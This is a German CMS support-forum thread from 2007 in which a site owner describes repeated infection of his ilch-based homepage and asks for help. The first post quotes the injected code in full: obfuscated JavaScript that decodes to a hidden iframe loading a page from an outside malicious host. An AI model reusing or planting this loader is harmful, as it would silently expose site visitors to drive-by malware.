ilch Forum » Ilch Clan 1.1 » Fehlersuche und Probleme » Trojaner+Viren Meldung

Geschlossen
  1. Fr. 02.11.2007 14:32 Uhr #1
    User Pic
    huberinfo Mitglied
    Registriert seit
    06.07.2007
    Beiträge
    8
    Beitragswertungen
    0 Beitragspunkte
    Hallo,

    seit einiger Zeit bekam ich + Nutzer meiner Homepage Trojaner und Virenmeldungen und zum Schluss wurde bei Aufruf der Homepage sofort auf eine russische Seite weitergeleitet.

    Nach Studium des Forums hier, suchte ich in den bislang bekannten infizierten Dateien (index.php..etc) nach dem Eintrag "iframe...), fand diesen aber nicht.

    Dafür waren aber die Dateien mit einem Javacode erweitert worden.
    Also alles auf dem Server gelöscht und eine Sicherung neu aufgespielt...alles in Ordnung.
    Aber am nächsten Tag das gleiche Spiel und wieder und wieder.

    Die FTP..etc. Passwörter wurden auch schon geändert.

    Durch das Modul "IP-Scanner" von hier, stellte ich nun fest, das ein zeitlicher Zusammenhang mit Spam-Einträgen aus China im öffentlichen Forum bestand.

    Der "Eintrag" im Forum bestand aus einer sehr langen Kette von Zahlen und Buchstaben (55 6h...etc).

    In den infizierten Dateien, war dieser Eintrag hinzugefügt worden:

    <script>function v4725fb043ac01(v4725fb043b3cf){ var v4725fb043bbb2=16; return(parseInt(v4725fb043b3cf,v4725fb043bbb2));}function v4725fb043cb61(v4725fb043d358){ function v4725fb043ee91 () {return 2;} var v4725fb043def3='';for(v4725fb043e6c1=0; v4725fb043e6c1<v4725fb043d358.length; v4725fb043e6c1+=v4725fb043ee91()){ v4725fb043def3+=(String.fromCharCode(v4725fb043ac01(v4725fb043d358.substr(v4725fb043e6c1, v4725fb043ee91()))));}return v4725fb043def3;} document.write(v4725fb043cb61('3C5343524950543E77696E646F772E7374617475733D27446F6
    E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D3034613564386
    23664207372633D5C27687474703A2F2F73746F636B2D73746174732E696E666F2F707269766174
    655F666F72756D2F696E6465782E7068703F272B4D6174682E726F756E64284D6174682E72616E6
    46F6D28292A313434363036292B27336632635C272077696474683D343632206865696768743D33
    3133207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293
    C2F5343524950543E'));</script>

    Da ich wirklich keine Ahnung von php habe, nun meine Frage:

    Ist es möglich, das das interne Ilch-Forum eine Lücke hat und darüber dieser Code "eingeschleust" wurde?
    Ist das ein Javacode?
    Was kann man dagegen tun?

    Natürlich habe ich nun das öffentliche Forum für Gäste gesperrt.
    Mal schauen, ob nun alles ok ist.

    Gruss
    Huberinfo


    verwendete ilchClan Version: 1.1

    betroffene Homepage: externer Link


    Zuletzt modifiziert von huberinfo am 02.11.2007 - 14:36:04
    0 Mitglieder finden den Beitrag gut.
  2. Fr. 02.11.2007 14:42 Uhr #2
    User Pic
    TSG Mitglied
    Registriert seit
    24.07.2007
    Beiträge
    1.065
    Beitragswertungen
    0 Beitragspunkte
    ich nehme an das der server gehackt wurde
    toilette-musik.net
    toilette-musik.net
    0 Mitglieder finden den Beitrag gut.
  3. Fr. 02.11.2007 14:46 Uhr #3
    User Pic
    huberinfo Mitglied
    Registriert seit
    06.07.2007
    Beiträge
    8
    Beitragswertungen
    0 Beitragspunkte
    Das könnte zwar sein, aber ich gehe nicht davon aus, da ich ein Premium-Paket bei 1&1 habe und dieser Hoster ja weder ein Freehoster noch ein kleiner Hoster ist.
    0 Mitglieder finden den Beitrag gut.
  4. Fr. 02.11.2007 15:01 Uhr #4
    User Pic
    TSG Mitglied
    Registriert seit
    24.07.2007
    Beiträge
    1.065
    Beitragswertungen
    0 Beitragspunkte
    ja ich bin bei t-online und es wurde schon gehackt das hat nix zu sagen und jetzt habe ich nur noch die domain bei t-online die server stehen bei meiner arbeits stehle^^


    Zuletzt modifiziert von TSG am 02.11.2007 - 16:09:02
    toilette-musik.net
    toilette-musik.net
    0 Mitglieder finden den Beitrag gut.
Geschlossen

Zurück zu Fehlersuche und Probleme

Optionen: Bei einer Antwort zu diesem Thema eine eMail erhalten